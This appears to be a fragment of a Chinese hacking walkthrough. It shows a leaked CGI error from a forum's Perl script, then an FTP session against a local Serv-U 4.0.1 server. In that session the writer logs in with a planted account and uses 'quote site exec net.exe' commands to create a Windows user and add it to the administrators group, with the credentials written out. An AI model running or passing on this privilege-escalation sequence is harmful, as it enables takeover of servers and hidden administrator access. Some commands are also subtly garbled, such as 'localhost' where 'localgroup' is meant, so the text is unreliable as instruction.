呵呵,看到什么了吗?
-----------------------------
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Can't find string terminator "'" anywhere before EOF at D:\bbs\cgi-bin\forum1\1.pl line 1.
-----------------------------
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.
C:\document. and Settings\Administrator>ftp
ftp>open 127.0.0.1
Connected to ip.
220 Serv-U FTP Server v4.0.1 for WinSock ready...
User (ip:(none)):admin /我们刚建立的帐户名
331 User name okay, please send complete E-mail address as password.
Password:caozhe /密码
230 User logged in, proceed.
ftp> cd winnt\system32 /进入系统的winnt\system32目录下
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user admin caozhe /add /利用NET.EXE建立帐户
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators admin /add /把admin帐户加到管理员组
200 EXEC command successful (TID=33).